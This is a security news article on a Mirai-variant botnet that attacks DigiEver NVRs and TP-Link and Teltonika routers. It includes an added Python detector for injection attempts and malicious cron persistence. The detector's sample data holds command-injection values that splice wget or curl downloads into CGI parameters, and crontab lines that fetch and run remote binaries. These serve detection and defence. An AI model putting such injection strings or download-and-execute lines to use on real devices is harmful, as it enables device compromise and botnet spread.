New Mirai Variant Unleashes Wave of Attacks on IoT devices
A newly discovered Mirai-based botnet is exploiting previously unpatched vulnerabilities in a range of internet-connected devices, including DigiEver DS-2105 Pro Network Video Recorders (NVRs), TP-Link routers, and Teltonika RUT9XX routers. The campaign, which began in September and intensified in November, highlights the ongoing threat posed by IoT vulnerabilities and the persistent evolution of malware.
The attacks leverage a previously documented, yet unpatched, remote code execution (RCE) vulnerability in DigiEver NVRs, targeting the ‘/cgi-bin/cgi_main.cgi’ URI. This vulnerability, similar to one presented by TXOne researcher Ta-Lun Yen at DefCamp 2022 in Bucharest, Romania, allows attackers to inject malicious commands through improperly validated user inputs. “The issue affects multiple DVR devices,” Yen stated at the conference. A video of his presentation is available here.
Exploiting Multiple Vulnerabilities
Beyond the DigiEver flaw, this refined Mirai variant also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers. This multi-pronged approach demonstrates the botnet’s adaptability and its operators’ commitment to maximizing their reach.
Akamai researchers, who first observed the intensified attacks in mid-November, describe the malware as notable for its use of XOR and ChaCha20 encryption and its broad targeting of x86, ARM, and MIPS system architectures. “Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” comments Akamai in their report. “This is mostly notable because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original Mirai malware source code release,” they add.
The Attack Methodology
The attackers utilize command injection to download the malware binary from a remote server, establishing persistence through the addition of cron jobs. Once compromised, devices are used for distributed denial-of-service (DDoS) attacks or to further spread the malware using exploit sets and stolen credentials. This highlights the cascading effect of a single vulnerability, potentially impacting countless devices and networks.
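As an added illustration, not code from the article or from the Akamai report, the following Python detector checks for the two behaviours described above: requests to the ‘/cgi-bin/cgi_main.cgi’ endpoint whose parameter values splice in a download command, and crontab entries that fetch a remote file and execute it. The log lines, crontab entries, parameter names and 192.0.2.0/24 addresses are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample data, not taken from the Akamai report. 192.0.2.0/24 is the
# RFC 5737 documentation range and the parameter names are placeholders.
ACCESS_LOG = [
    '192.0.2.10 - - [20/Nov/2024:10:01:02 +0000] "GET /cgi-bin/cgi_main.cgi?cgiName=login HTTP/1.1" 200 512',
    '192.0.2.77 - - [20/Nov/2024:10:01:05 +0000] "POST /cgi-bin/cgi_main.cgi?cgiName=setup&host=%3Bwget%20http%3A%2F%2F192.0.2.200%2Fx.sh HTTP/1.1" 200 0',
    '192.0.2.11 - - [20/Nov/2024:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '192.0.2.77 - - [20/Nov/2024:10:02:30 +0000] "GET /cgi-bin/cgi_main.cgi?cgiName=setup&host=$(curl+192.0.2.200/b) HTTP/1.1" 500 0',
]
CRONTAB = [
    "0 3 * * * /usr/sbin/ntpdate pool.ntp.org",
    "* * * * * wget http://192.0.2.200/bot -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x",
    "*/5 * * * * /usr/bin/curl -s http://192.0.2.200/s | sh",
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\w+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
TARGET = "/cgi-bin/cgi_main.cgi"
SHELL_META = re.compile(r'[;|&`]|\$\(')                  # separators that splice in a second command
DOWNLOADER = re.compile(r'\b(wget|curl|tftp|ftpget)\b', re.I)
REMOTE_EXEC = re.compile(r'\b(wget|curl|tftp)\b.*(\|\s*(sh|bash)\b|chmod\s+\+x)', re.I)

def _param_values(uri):
    """Decode each query parameter value separately, so the '&' between
    parameters is not mistaken for a shell operator."""
    query = uri.partition("?")[2]
    return [unquote_plus(p.partition("=")[2]) for p in query.split("&") if p]

def flag_cgi_requests(lines):
    """Return (ip, value) for requests to the DigiEver CGI endpoint whose
    parameter value carries a shell separator plus a download tool, the
    pattern used to pull the bot binary after command injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m.group("uri").startswith(TARGET):
            continue
        for value in _param_values(m.group("uri")):
            if SHELL_META.search(value) and DOWNLOADER.search(value):
                hits.append((m.group("ip"), value))
                break
    return hits

def flag_cron_entries(lines):
    """Return crontab lines that fetch a remote file and run it, the
    persistence mechanism the campaign installs on compromised devices."""
    return [entry for entry in lines if REMOTE_EXEC.search(entry)]
```

Run `flag_cgi_requests` over an NVR's web-server access log and `flag_cron_entries` over the device's crontab; on the constructed data both injection attempts from 192.0.2.77 and the two remote-fetch cron lines are reported.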
Indicators of compromise (IoCs) and Yara rules for detection and blocking are available in the Akamai report. The timely patching of vulnerabilities and the implementation of robust security measures are crucial in mitigating the risk of such attacks. For U.S. consumers, this underscores the importance of regularly updating firmware on all internet-connected devices and practicing good cybersecurity hygiene.